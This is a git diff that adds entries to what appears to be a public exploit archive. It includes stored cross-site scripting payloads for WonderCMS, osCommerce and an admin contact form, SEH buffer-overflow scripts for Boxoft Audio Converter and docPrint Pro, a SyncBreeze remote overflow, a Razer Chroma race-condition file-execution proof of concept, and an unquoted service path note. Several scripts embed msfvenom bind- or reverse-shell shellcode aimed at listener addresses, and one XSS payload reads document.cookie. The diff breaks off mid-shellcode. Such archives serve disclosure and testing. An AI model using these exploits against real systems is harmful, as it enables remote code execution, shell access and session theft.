+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: localhost/admin/index.php?route=marketing/contact&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: __cfduid=d6a6bab42bd30fb2b2e20cad3dd5a80ed1606187757;
+
+store_id=0&to=newsletter&customer_group_id=1&customers=&affiliates=&products=&subject=hemantsolo%22%2F%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self
\ No newline at end of file
diff --git a/exploits/php/webapps/49102.txt b/exploits/php/webapps/49102.txt
new file mode 100644
index 000000000..85afb2c42
--- /dev/null
+++ b/exploits/php/webapps/49102.txt
@@ -0,0 +1,22 @@
+# Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting
+# Date: 20-11-2020
+# Exploit Author: Mayur Parmar
+# Vendor Homepage: https://www.wondercms.com/
+# Version: 3.1.3
+# Tested on: PopOS
+
+Stored Cross-site scripting(XSS):
+Stored attacks are those where the injected script is permanently stored on the target servers,
+such as in a database, in a message forum, visitor log, comment field, etc.
+The victim then retrieves the malicious script from the server when it requests the stored information.
+Stored XSS is also sometimes referred to as Persistent XSS.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Page keywords and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Page Title.
+
+Steps-To-Reproduce:
+1. Go to the Simple website builder.
+2. Put this payload in Page keywords: Mayur"><img src=x onerror=confirm("XSS")>
+3. Now go to the website and the XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49103.txt b/exploits/php/webapps/49103.txt
new file mode 100644
index 000000000..3d78d40cd
--- /dev/null
+++ b/exploits/php/webapps/49103.txt
@@ -0,0 +1,112 @@
+# Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting
+# Date: 2020-11-19
+# Exploit Author: Emre Aslan
+# Vendor Homepage: https://www.oscommerce.com/
+# Version: 2.3.4.1
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Login to admin panel.
+2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new
+3- Enter the XSS payload into the title section and save it.
+
+==> Vulnerable Parameter <==
+
+title= (post parameter)
+
+==> HTTP Request <==
+
+POST /catalog/admin/newsletters.php?action=insert HTTP/1.1
+Host: (HOST)
+Connection: keep-alive
+Content-Length: 123
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://(HOST)/
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://(HOST)/catalog/admin/newsletters.php?action=new
+Accept-Encoding: gzip, deflate, br
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: osCAdminID=s11ou44m0vrasducn78c6sg
+
+module=newsletter&title="><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img>&content=xss
+
+==> Vulnerable Source Code <==
+
+<div id="contentText">
+    <table border="0" width="100%" cellspacing="0" cellpadding="2">
+      <tr>
+        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
+          <tr>
+            <td class="pageHeading">Newsletter Manager</td>
+            <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40" /></td>
+          </tr>
+        </table></td>
+      </tr>
+      <tr>
+        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
+          <tr>
+            <td valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
+              <tr class="dataTableHeadingRow">
+                <td class="dataTableHeadingContent">Newsletters</td>
+                <td class="dataTableHeadingContent" align="right">Size</td>
+                <td class="dataTableHeadingContent" align="right">Module</td>
+                <td class="dataTableHeadingContent" align="center">Sent</td>
+                <td class="dataTableHeadingContent" align="center">Status</td>
+                <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
+              </tr>
+                  <tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview'">
+                <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></td>
+                <td class="dataTableContent" align="right">3 bytes</td>
+                <td class="dataTableContent" align="right">newsletter</td>
+                <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td>
+                <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td>
+                <td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="" />&nbsp;</td>
+              </tr>
+                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1'">
+                <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(1)"></img></td>
+                <td class="dataTableContent" align="right">7 bytes</td>
+                <td class="dataTableContent" align="right">newsletter</td>
+                <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td>
+                <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td>
+                <td class="dataTableContent" align="right"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1"><img src="images/icon_info.gif" border="0" alt="Info" title="Info" /></a>&nbsp;</td>
+              </tr>
+              <tr>
+                <td colspan="6"><table border="0" width="100%" cellspacing="0" cellpadding="2">
+                  <tr>
+                    <td class="smallText" valign="top">Displaying <strong>1</strong> to <strong>2</strong> (of <strong>2</strong> newsletters)</td>
+                    <td class="smallText" align="right">Page 1 of 1</td>
+                  </tr>
+                  <tr>
+                    <td class="smallText" align="right" colspan="2"><span class="tdbLink"><a id="tdb1" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?action=new">New Newsletter</a></span><script type="text/javascript">$("#tdb1").button({icons:{primary:"ui-icon-plus"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td>
+                  </tr>
+                </table></td>
+              </tr>
+            </table></td>
+            <td width="25%" valign="top">
+<table border="0" width="100%" cellspacing="0" cellpadding="2">
+  <tr class="infoBoxHeading">
+    <td class="infoBoxHeading"><strong>"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></strong></td>
+  </tr>
+</table>
+<table border="0" width="100%" cellspacing="0" cellpadding="2">
+  <tr>
+    <td align="center" class="infoBoxContent"><span class="tdbLink"><a id="tdb2" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview">Preview</a></span><script type="text/javascript">$("#tdb2").button({icons:{primary:"ui-icon-document"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script><span class="tdbLink"><a id="tdb3" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=lock">Lock</a></span><script type="text/javascript">$("#tdb3").button({icons:{primary:"ui-icon-locked"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td>
+  </tr>
+  <tr>
+    <td class="infoBoxContent"><br />Date Added: 11/19/2020</td>
+  </tr>
+</table>
+            </td>
+          </tr>
+        </table></td>
+      </tr>
+    </table>
+</div>
\ No newline at end of file
diff --git a/exploits/windows/local/49089.py b/exploits/windows/local/49089.py
new file mode 100755
index 000000000..aa60f8902
--- /dev/null
+++ b/exploits/windows/local/49089.py
@@ -0,0 +1,55 @@
+# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
+# Discovery by: Luis Martinez
+# Discovery Date: 2020-11-22
+# Vendor Homepage: http://www.boxoft.com/
+# Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe
+# Tested Version: 2.3.0
+# Vulnerability Type: Local Buffer Overflow (SEH)
+# Tested on OS: Windows 10 Pro (10.0.18362) x64 en
+ 
+# Steps to Produce the Local Buffer Overflow (SEH): 
+# 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py
+# 2.- Open AudioConvert.exe
+# 3.- Try
+# 4.- Batch Convert Mode -> Next
+# 5.- Add
+# 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open
+# 7.- Port 4444 open
+ 
+#!/usr/bin/env python
+#-*-coding: utf-8-*-
+
+#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
+
+shellcode = ("\xbb\x80\x84\x2c\xbc\xda\xce\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
+"\x53\x31\x5e\x12\x83\xc6\x04\x03\xde\x8a\xce\x49\x22\x7a\x8c"
+"\xb2\xda\x7b\xf1\x3b\x3f\x4a\x31\x5f\x34\xfd\x81\x2b\x18\xf2"
+"\x6a\x79\x88\x81\x1f\x56\xbf\x22\x95\x80\x8e\xb3\x86\xf1\x91"
+"\x37\xd5\x25\x71\x09\x16\x38\x70\x4e\x4b\xb1\x20\x07\x07\x64"
+"\xd4\x2c\x5d\xb5\x5f\x7e\x73\xbd\xbc\x37\x72\xec\x13\x43\x2d"
+"\x2e\x92\x80\x45\x67\x8c\xc5\x60\x31\x27\x3d\x1e\xc0\xe1\x0f"
+"\xdf\x6f\xcc\xbf\x12\x71\x09\x07\xcd\x04\x63\x7b\x70\x1f\xb0"
+"\x01\xae\xaa\x22\xa1\x25\x0c\x8e\x53\xe9\xcb\x45\x5f\x46\x9f"
+"\x01\x7c\x59\x4c\x3a\x78\xd2\x73\xec\x08\xa0\x57\x28\x50\x72"
+"\xf9\x69\x3c\xd5\x06\x69\x9f\x8a\xa2\xe2\x32\xde\xde\xa9\x5a"
+"\x13\xd3\x51\x9b\x3b\x64\x22\xa9\xe4\xde\xac\x81\x6d\xf9\x2b"
+"\xe5\x47\xbd\xa3\x18\x68\xbe\xea\xde\x3c\xee\x84\xf7\x3c\x65"
+"\x54\xf7\xe8\x10\x5c\x5e\x43\x07\xa1\x20\x33\x87\x09\xc9\x59"
+"\x08\x76\xe9\x61\xc2\x1f\x82\x9f\xed\x0e\x0f\x29\x0b\x5a\xbf"
+"\x7f\x83\xf2\x7d\xa4\x1c\x65\x7d\x8e\x34\x01\x36\xd8\x83\x2e"
+"\xc7\xce\xa3\xb8\x4c\x1d\x70\xd9\x52\x08\xd0\x8e\xc5\xc6\xb1"
+"\xfd\x74\xd6\x9b\x95\x15\x45\x40\x65\x53\x76\xdf\x32\x34\x48"
+"\x16\xd6\xa8\xf3\x80\xc4\x30\x65\xea\x4c\xef\x56\xf5\x4d\x62"
+"\xe2\xd1\x5d\xba\xeb\x5d\x09\x12\xba\x0b\xe7\xd4\x14\xfa\x51"
+"\x8f\xcb\x54\x35\x56\x20\x67\x43\x57\x6d\x11\xab\xe6\xd8\x64"
+"\xd4\xc7\x8c\x60\xad\x35\x2d\x8e\x64\xfe\x5d\xc5\x24\x57\xf6"
+"\x80\xbd\xe5\x9b\x32\x68\x29\xa2\xb0\x98\xd2\x51\xa8\xe9\xd7"
+"\x1e\x6e\x02\xaa\x0f\x1b\x24\x19\x2f\x0e")
+
+nSEH = "\xeb\x06\x90\x90"
+SEH = "\xB8\x68\x40\x00" #AudioConvert.exe
+ 
+buffer = "\x41" * 4132 + nSEH + SEH + "\x90" * 16 + shellcode
+f = open ("Boxotf_Audio_Converter_2.3.0.wav", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/49100.py b/exploits/windows/local/49100.py
new file mode 100755
index 000000000..acf6c7333
--- /dev/null
+++ b/exploits/windows/local/49100.py
@@ -0,0 +1,99 @@
+# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
+# Date: 2020-07-26
+# Exploit Author: MasterVlad
+# Vendor Homepage: http://www.verypdf.com
+# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
+# Version: 8.0
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 32-bit
+
+# Proof of Concept:
+
+# 1. Run the python script
+# 2. Open exploit.txt and copy the content to clipboard
+# 3. Open doc2pdf_win.exe and go to File -> Add URL
+# 4. Paste the clipboard into the field and click on Ok
+
+#!/usr/bin/python
+
+# encoded egghunter
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
+egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
+
+buf =  ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
+buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
+buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
+buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
+buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
+buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
+buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
+buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
+buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
+buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
+buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
+buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
+buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
+buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
+buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
+buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
+buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
+buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
+buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
+buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
+buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
+buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
+buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
+buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
+buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
+buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
+buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
+buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
+buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
+buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
+buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
+buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
+buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
+buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
+buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
+buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
+buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
+buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
+buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
+buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
+buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
+buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
+buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
+buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
+buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
+buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
+buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
+buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
+buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
+buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
+
+exploit = "A"*3876
+exploit += "\x74\x06\x75\x04"
+# 0x1001062d - pop pop ret - reg.dll
+exploit += "\x2d\x06\x01\x10"
+exploit += egg
+exploit += "D"*(10000-3884-len(egg)-len(buf)-8)
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/49101.txt b/exploits/windows/local/49101.txt
new file mode 100644
index 000000000..bafbade3e
--- /dev/null
+++ b/exploits/windows/local/49101.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path
+# Date: 2020-11-24
+# Exploit Author: Luis Sandoval
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link: https://www.wondershare.com/drfone/
+# Version: 10.7.1.321
+# Tested on: Windows 10 Home Single Language x64 Esp
+
+# Service info:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Wondershare Driver Install Service help    ElevationService   C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe     Auto
+
+C:\Users\user>sc qc ElevationService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ElevationService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Wondershare Driver Install Service help
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/remote/49106.py b/exploits/windows/remote/49106.py
new file mode 100755
index 000000000..3ee674ff3
--- /dev/null
+++ b/exploits/windows/remote/49106.py
@@ -0,0 +1,119 @@
+Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution
+Date: 2020-08-13
+Exploit Author: Loke Hui Yi
+Vendor Homepage: https://razerid.razer.com
+Software Link: http://rzr.to/synapse-3-pc-download
+Version: <= v3.12.17
+Tested on: Windows 10
+CVE: CVE-2020-16602
+
+# More info can be found here: 
+# https://www.angelystor.com/2020/09/cve-2020-16602-remote-file-execution-on.html
+# https://www.youtube.com/watch?v=fkESBVhIdIA
+
+# Remote attackers can register applications to the Chroma Server. If the attacker has write access to the ProgramData folder where the Chroma Server stores its data, he can exploit a race condition and get the server to execute a binary of his choosing.
+
+# The code below registers an application to the Chroma Server using a name of the attacker's choosing. 
+
+# The attacker will need to pre-create a folder with the same name as the application to be registered in Razer Chroma SDK\Apps\<appname>, and create an exe file with the same application's name in that folder. The Apps folder is user writable and does not require admin privileges.
+
+# The attacker can keep running the code below to get the Server to execute the file while writing  the payload to the target directory with another process (eg samba or ftp) in order to exploit the race condition.
+
+import requests
+import json
+
+
+def heartbeat(uri):
+    print(uri + '/heartbeat')
+    r = requests.put(uri + '/heartbeat', verify=False)
+    print(r.text)
+
+def keyboard(uri):
+    data = {
+        "effect":"CHROMA_CUSTOM_KEY",
+        "param":{
+            "color":[
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535]
+            ],
+            "key":[
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, 0, (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, (16777216 | ~255), (16777216 | ~255), (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), 0, 0, 0, 0, 0],
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), (16777216 | ~16776960), (16777216 | ~16776960), 0, 0, 0, 0]
+            ]
+        }
+    }
+    print(uri + '/keyboard')
+    r = requests.put(uri + '/keyboard', json=data, verify=False)
+    print(r.text)
+
+text="a"
+
+for x in range(20000):
+    text += "a"
+
+pload = {
+    "title": "APPNAME",
+    "description": "description",
+    "author": {
+        "name": "name",
+        "contact": "contact"
+    },
+    "device_supported": [
+        "keyboard",
+        "mouse",
+        "headset",
+        "mousepad",
+        "keypad",
+        "chromalink"],
+    "category": "application"
+}
+server = 'https://chromasdk.io:54236/razer/chromasdk'
+r = requests.post(server, json=pload, verify=False)
+
+json_data = json.loads(r.text)
+
+print(json_data)
+uri = json_data['uri']
+
+heartbeat(uri)
+
+#uri = 'https://chromasdk.io:54236/sid=58487'
+heartbeat(uri)
+
+keyboard(uri)
+
+
+print (json_data['sessionid'])
+
+do_heartbeat = False
+
+if do_heartbeat:
+    sid = 1
+    uri = 'https://chromasdk.io:54236/sid=' + sid
+    heartbeat(uri)
+
+# PoC loop.py for race test
+'''
+import requests
+
+def copyfile(src, dst):
+    with open(src, 'rb') as fsrc:
+        with open(dst, 'wb') as fdst:
+            content = fsrc.read()
+            fdst.write(content)
+
+while True:
+    try:
+        print("copying")
+        copyfile('pwn.exe', 'C:\\ProgramData\\Razer Chroma SDK\\Apps\\pwn\\pwn.exe')
+    except Exception as e:
+        print(str(e))
+'''
\ No newline at end of file
diff --git a/exploits/windows/webapps/49104.py b/exploits/windows/webapps/49104.py
new file mode 100755
index 000000000..68029247d
--- /dev/null
+++ b/exploits/windows/webapps/49104.py
@@ -0,0 +1,70 @@
+# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
+# Date: 18-Sep-2020
+# Exploit Author: Abdessalam king(A.salam)
+# Vendor Homepage: http://www.syncbreeze.com
+# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
+# Version: 10.0.28
+# Tested on: Windows 7,windows xp,windows 10
+#72413372 [*] Exact match at offset 520
+#jmp esp FFE4 \xff\xe4
+#!mona modules
+#!mona find -s "\xff\xe4" -m libspp.dll
+#address esp => 10090C83
+#badchars ==> "\x00\x0a\x0d\x25\x26\x2b\x3d"
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c
+-b "\x00\x0a\x0d\x25\x26\x2b\x3d"  EXITFUNC=thread
+#!/usr/bin/python
+import socket
+
+shell =""
+shell +="\xba\x4b\x38\x98\x39\xdd\xc7\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
+shell +="\x53\x83\xef\xfc\x31\x57\x10\x03\x57\x10\xa9\xcd\x64\xd1\xaf"
+shell +="\x2e\x95\x22\xcf\xa7\x70\x13\xcf\xdc\xf1\x04\xff\x97\x54\xa9"
+shell +="\x74\xf5\x4c\x3a\xf8\xd2\x63\x8b\xb6\x04\x4d\x0c\xea\x75\xcc"
+shell +="\x8e\xf0\xa9\x2e\xae\x3b\xbc\x2f\xf7\x21\x4d\x7d\xa0\x2e\xe0"
+shell +="\x92\xc5\x7a\x39\x18\x95\x6b\x39\xfd\x6e\x8a\x68\x50\xe4\xd5"
+shell +="\xaa\x52\x29\x6e\xe3\x4c\x2e\x4a\xbd\xe7\x84\x21\x3c\x2e\xd5"
+shell +="\xca\x93\x0f\xd9\x39\xed\x48\xde\xa1\x98\xa0\x1c\x5c\x9b\x76"
+shell +="\x5e\xba\x2e\x6d\xf8\x49\x88\x49\xf8\x9e\x4f\x19\xf6\x6b\x1b"
+shell +="\x45\x1b\x6a\xc8\xfd\x27\xe7\xef\xd1\xa1\xb3\xcb\xf5\xea\x60"
+shell +="\x75\xaf\x56\xc7\x8a\xaf\x38\xb8\x2e\xbb\xd5\xad\x42\xe6\xb1"
+shell +="\x02\x6f\x19\x42\x0c\xf8\x6a\x70\x93\x52\xe5\x38\x5c\x7d\xf2"
+shell +="\x3f\x77\x39\x6c\xbe\x77\x3a\xa4\x05\x23\x6a\xde\xac\x4b\xe1"
